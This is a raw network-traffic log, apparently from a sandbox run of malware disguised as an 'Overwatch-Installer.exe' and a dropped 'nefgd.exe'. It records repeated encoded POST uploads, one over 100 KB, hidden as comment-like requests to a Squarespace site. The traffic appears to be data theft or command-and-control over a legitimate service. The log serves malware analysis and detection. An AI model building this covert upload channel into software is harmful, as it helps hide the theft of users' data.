2024-09-01 20:03:44 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:03:44 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:03:44 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:03:44 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 72 66 6c 48 6d 33 6b 74 71 69 57 73 67 56 52 6c 51 6d 68 35 79 36 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2rflHm3ktqiWsgVRlQmh5y6if6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:03:44 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:03:44 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfZYSwBYxpu0ODdjNjU2MWM4MmY5NThmM2Q4Yjk2OTEwY2VlMjk3; Path=/; Secure Set-Cookie: crumb=BSAlMn9rAqG1ZmM1OTFhNWYxZDFiOGNjZDlkZTI3Y2U0ZTJmNmZk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: dXQxtEnL/fykuZ9OA Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSAlMn9rAqG1ZmM1OTFhNWYxZDFiOGNjZDlkZTI3Y2U0ZTJmNmZk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49719	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:03:45 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 320 Expect: 100-continue
2024-09-01 20:03:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:03:45 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:03:45 UTC	319	OUT	Data Raw: 3d 75 6b 63 56 59 6b 4b 66 4e 55 38 59 78 51 69 45 47 48 32 73 55 72 73 6d 4f 76 51 48 44 61 57 54 4f 4a 7a 44 56 38 31 37 53 35 2f 76 76 73 54 61 59 6b 48 49 47 25 32 42 6e 46 51 66 58 6e 69 63 74 42 76 77 4b 5a 77 78 49 6a 6b 69 69 68 50 44 75 48 49 4e 34 49 75 30 31 33 50 56 54 39 2f 7a 64 75 36 6e 5a 45 63 51 4a 66 52 71 42 38 64 65 48 35 61 39 47 52 44 69 6c 73 6e 4d 6c 55 79 56 6c 37 33 52 4a 43 33 59 71 6f 45 56 6a 55 42 6f 70 4b 6a 4b 5a 75 45 56 36 4b 33 79 35 33 58 78 56 49 6f 4a 54 79 66 44 6d 30 6d 76 76 62 6f 4b 51 30 37 2f 76 32 4a 4d 31 57 64 6d 53 2f 58 4a 4d 50 59 50 4a 71 59 52 67 6c 51 4b 6c 6a 64 39 63 65 43 41 6e 48 2f 37 73 76 35 78 62 41 49 34 31 73 31 34 4b 39 77 30 42 4b 48 64 45 64 49 52 62 4c 44 6a 35 65 55 74 4b 46 47 6e 33 25 Data Ascii: =ukcVYkKfNU8YxQiEGH2sUrsmOvQHDaWTOJzDV817S5/vvsTaYkHIG%2BnFQfXnictBvwKZwxIjkiihPDuHIN4Iu013PVT9/zdu6nZEcQJfRqB8deH5a9GRDilsnMlUyVl73RJC3YqoEVjUBopKjKZuEV6K3y53XxVIoJTyfDm0mvvboKQ07/v2JM1WdmS/XJMPYPJqYRglQKljd9ceCAnH/7sv5xbAI41s14K9w0BKHdEdIRbLDj5eUtKFGn3%
2024-09-01 20:03:45 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:03:45 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZk7mjMwYpNJMzUwODQwMjk1ZDZiNWQ5ZmUyMDJhMjBiNDQyN2M3; Path=/; Secure Set-Cookie: crumb=Be6c4ZwBer0RNzM4ZmJlZTUxYzU0OGNlNGY1MDc2YWFkZGRiNjJm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 6WSxw8h9/fEb6fNGS Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Be6c4ZwBer0RNzM4ZmJlZTUxYzU0OGNlNGY1MDc2YWFkZGRiNjJm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49720	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:03:46 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 596 Expect: 100-continue
2024-09-01 20:03:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:03:46 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:03:46 UTC	595	OUT	Data Raw: 3d 32 5a 7a 79 73 32 42 66 46 79 6c 33 4c 32 61 4e 6d 55 61 41 73 5a 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6f 5a 35 5a 49 52 35 58 79 41 6a 44 6c 4e 4f 55 74 59 58 66 70 48 71 6c 49 4c 69 58 6d 38 51 36 65 31 58 6f 35 42 6c 33 37 34 31 6f 25 32 42 41 58 72 6c 58 48 50 48 54 41 5a 45 4e 66 30 4a 7a 6f 62 79 66 37 73 64 63 25 32 42 51 6f 44 70 50 4c 76 75 79 4f 6c 4c 43 62 6b 32 44 4a 46 41 50 31 6e 78 79 79 35 4b 59 49 68 68 50 43 78 56 48 67 69 6b 47 72 49 47 63 4b 68 50 36 63 52 4f 52 63 72 4b 6a 5a 6f 42 33 73 61 53 76 68 43 33 79 43 72 68 62 30 6a 74 66 5a 64 6e 57 38 52 74 6c 25 32 42 42 42 33 58 Data Ascii: =2Zzys2BfFyl3L2aNmUaAsZkpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXoZ5ZIR5XyAjDlNOUtYXfpHqlILiXm8Q6e1Xo5Bl3741o%2BAXrlXHPHTAZENf0Jzobyf7sdc%2BQoDpPLvuyOlLCbk2DJFAP1nxyy5KYIhhPCxVHgikGrIGcKhP6cRORcrKjZoB3saSvhC3yCrhb0jtfZdnW8Rtl%2BBB3X
2024-09-01 20:03:46 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:03:46 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRJTF-ZT_dsGMTRkMTgzOTEwZGE2ZGNkYjE3YzM3OTczYmE4NzM0; Path=/; Secure Set-Cookie: crumb=BTb9imnf3PJUOThkNzkyYWNlNGVlYWM2MWQxNTFhNDZjNTYwNWMz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: mYbS0Esw/u5e6CXQ0 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTb9imnf3PJUOThkNzkyYWNlNGVlYWM2MWQxNTFhNDZjNTYwNWMz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49722	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:06 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 870 Expect: 100-continue
2024-09-01 20:04:06 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:06 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:06 UTC	869	OUT	Data Raw: 3d 31 44 76 39 63 50 47 2f 53 33 50 68 73 55 69 4d 49 25 32 42 4e 55 30 35 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 42 54 57 64 7a 57 59 33 39 63 45 74 67 79 58 6d 47 69 35 64 7a 36 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 59 51 46 69 7a 73 41 41 4e 39 67 31 79 62 7a 57 7a 65 39 79 5a 4a 33 64 57 25 32 42 33 55 68 72 43 4d 53 67 67 37 4c 45 64 4c 48 67 6d 78 65 57 67 67 65 39 6b 6b 37 42 71 79 6f 32 39 32 42 2f 2f 66 62 57 48 48 35 2f 53 36 47 39 6a 49 45 32 25 32 42 39 72 52 25 32 42 35 41 43 78 47 56 46 2f 6a 67 Data Ascii: =1Dv9cPG/S3PhsUiMI%2BNU05hiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2BTWdzWY39cEtgyXmGi5dz6if6WoKwL35zmxcg8o4aWu6Zb1bHB0TCYQFizsAAN9g1ybzWze9yZJ3dW%2B3UhrCMSgg7LEdLHgmxeWgge9kk7Bqyo292B//fbWHH5/S6G9jIE2%2B9rR%2B5ACxGVF/jg
2024-09-01 20:04:06 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:06 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbSS25MXjDYtMjZiMWI4OTkwZDNhNTY5ODBhOGZjYjY3MTZhMGE5; Path=/; Secure Set-Cookie: crumb=BY8VjJ85eaLPYzA2MjY4MzU1MmMzNTY1ZTAzOWVhNzU5ZGM3NzBj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: cV8qGIrl/xTBr3QWZ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BY8VjJ85eaLPYzA2MjY4MzU1MmMzNTY1ZTAzOWVhNzU5ZGM3NzBj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49723	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:06 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:06 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:06 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:06 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:06 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:06 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BS5xUG0YGxm8NmYyMGVmNjc0ZjM0ZjU5ZDZjZjc1NTVhNDU0OWVj; Path=/; Secure Set-Cookie: crumb=Bd4UGHFW8GWGYWZhYmI3ZTVmODgxZWMwODE0MzQzMjM3NWE0ZTUy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: IuHaZhxW/JTk3OoRA Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bd4UGHFW8GWGYWZhYmI3ZTVmODgxZWMwODE0MzQzMjM3NWE0ZTUy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49724	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:07 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108472 Expect: 100-continue
2024-09-01 20:04:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:07 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:07 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 51 6f 25 32 42 38 53 57 4b 78 25 32 42 70 73 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmQo%2B8SWKx%2BpsQgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm
2024-09-01 20:04:07 UTC	1	OUT	Data Raw: 45 Data Ascii: E
2024-09-01 20:04:07 UTC	16306	OUT	Data Raw: 52 6f 78 35 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 Data Ascii: Rox5%2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2
2024-09-01 20:04:07 UTC	1	OUT	Data Raw: 63 Data Ascii: c
2024-09-01 20:04:07 UTC	16306	OUT	Data Raw: 47 75 56 37 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d Data Ascii: GuV7HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjM
2024-09-01 20:04:07 UTC	1	OUT	Data Raw: 4c Data Ascii: L
2024-09-01 20:04:07 UTC	16306	OUT	Data Raw: 45 5a 36 4d 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 Data Ascii: EZ6MOG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPt
2024-09-01 20:04:07 UTC	1	OUT	Data Raw: 63 Data Ascii: c
2024-09-01 20:04:07 UTC	16306	OUT	Data Raw: 70 35 42 36 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 Data Ascii: p5B6ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2
2024-09-01 20:04:07 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:07 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BeXW-jUCnQXCYjA5YWEwNTM2NDIxN2E0ZDg3YWUwOWM3NGQ4Nzg5; Path=/; Secure Set-Cookie: crumb=BTMMMflzlK_pZWU2ZmNlOWQ3YmRlN2NiYWVjNjc0YzcwZTY2ZjUx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: K4eVpXWF/HT8g2ZGK Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTMMMflzlK_pZWU2ZmNlOWQ3YmRlN2NiYWVjNjc0YzcwZTY2ZjUx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49725	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:16 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:16 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:16 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
